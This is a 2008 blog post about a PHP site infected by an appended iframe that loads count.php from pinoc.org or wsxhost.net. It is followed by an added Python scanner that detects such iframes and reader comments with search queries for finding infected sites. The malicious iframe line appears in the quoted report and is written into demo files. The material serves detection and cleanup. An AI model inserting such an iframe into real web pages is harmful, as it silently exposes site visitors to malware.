${log.root}/lowem.log
Inflation, Investing and Everything


Tuesday September 30, 2008

wsxhost.net PHP virus/trojan infection via iframe code injection

One of my domains just got hacked. It must have happened sometime in the past 24 hours because I check on all my domains multiple times per day, and it was just picked up by the corporate firewall.

According to this site:

A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit ... it manifests itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes a URL query (GET) to a count.php file. External website varies (depends on infected slaves/hosts) but can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>"

- It's safe to say that all the .html and .php files are infected (I did a check). As of now, sub-domains are still safe for the moment, they are only infecting the main URL (www.[domain].com, etc).

Seems that there are a lot of PHP hacks going on these days. Just a week ago or so, a popular parenting forum which I am helping out with also got registration-spammed, even through the CAPTCHA - they were using the default PHPBB CAPTCHA though so I'd suppose that has gotten broken and leaks like a sieve by now.

Owners of PHP-based sites beware!

(2008-09-30 18:18:56 SGT) [Tech]
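A check for the appended line described in the quoted report, as an added example (not code from this post or from the quoted site): it walks a web root and reports iframes in .php/.html files that point at hosts other than the site's own, flagging those that sit at the end of a file and those that request count.php. The host www.example.com, the file layout and the page bodies are constructed for the demo; the iframe line is the one quoted above.

```python
import os
import re
import tempfile

# An <iframe> whose src is an absolute http(s) URL; captures host and path+query.
IFRAME_RE = re.compile(
    r'<iframe[^>]*\bsrc\s*=\s*["\']?https?://([^/"\'\s>]+)([^"\'\s>]*)', re.I)
SCAN_EXTS = (".php", ".html", ".htm")

def scan_file(path, own_hosts, tail_bytes=512):
    """Report iframes in one file that point at hosts other than the site's own."""
    with open(path, "rb") as fh:
        data = fh.read().decode("latin-1")  # latin-1 decodes any byte sequence
    findings = []
    for m in IFRAME_RE.finditer(data):
        host, url_path = m.group(1).lower(), m.group(2).lower()
        if host in own_hosts:
            continue
        appended = m.start() >= len(data) - tail_bytes  # "appended last" per the report
        findings.append({"file": path, "host": host, "appended": appended,
                         "count_php": "/count.php" in url_path})
    return findings

def scan_tree(root, own_hosts):
    """Walk a web root in a stable order and scan every .php/.html file."""
    results = []
    for dirpath, dirs, files in os.walk(root):
        dirs.sort()
        for name in sorted(files):
            if name.lower().endswith(SCAN_EXTS):
                results.extend(scan_file(os.path.join(dirpath, name), own_hosts))
    return results

def demo():
    """Scan a constructed web root: one clean page, two infected index.php files."""
    page = "<?php echo 'ok'; ?>\n" + "<p>content</p>\n" * 100
    clean = page + '<iframe src="http://www.example.com/map.html"></iframe>\n'
    bad = page + '<iframe src="http://pinoc.org/count.php?o=2" </iframe>'
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "administrator"))
        for rel, body in (("about.html", clean), ("index.php", bad),
                          (os.path.join("administrator", "index.php"), bad)):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        hits = scan_tree(root, own_hosts={"www.example.com"})
        return [(os.path.relpath(h["file"], root), h["host"],
                 h["appended"], h["count_php"]) for h in hits]

if __name__ == "__main__": print(*demo(), sep="\n")
```

On a real site, pass the document root and every hostname the site legitimately embeds as `own_hosts`; a hit with both flags set matches the pattern in the quoted report.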

Comments:

Maybe you can use this information to solve it.
http://forum.joomla.org/viewtopic.php?f=432&t=329768&p=1432932

Posted by Marco on September 30, 2008 at 08:37 PM SGT #

You're not alone. As of 9:56am Central Time (Chicago - home of the Cubs AND Sox)

Google search shows 96 other sites via: intext:pinoc.org/count.php

3 other sites via:
intext:pinoc.info/count.php

and 199 pages via:
intext:"count.php?o=2"

Many exploits out there. Just curious, how do you check your website? Browser? Or do you actually look at the code (View Source)?

Posted by Tom Raef on September 30, 2008 at 11:02 PM SGT #

Joomla has been affected.
What is the best way to protect?

Posted by Juan on October 04, 2008 at 05:47 AM SGT #
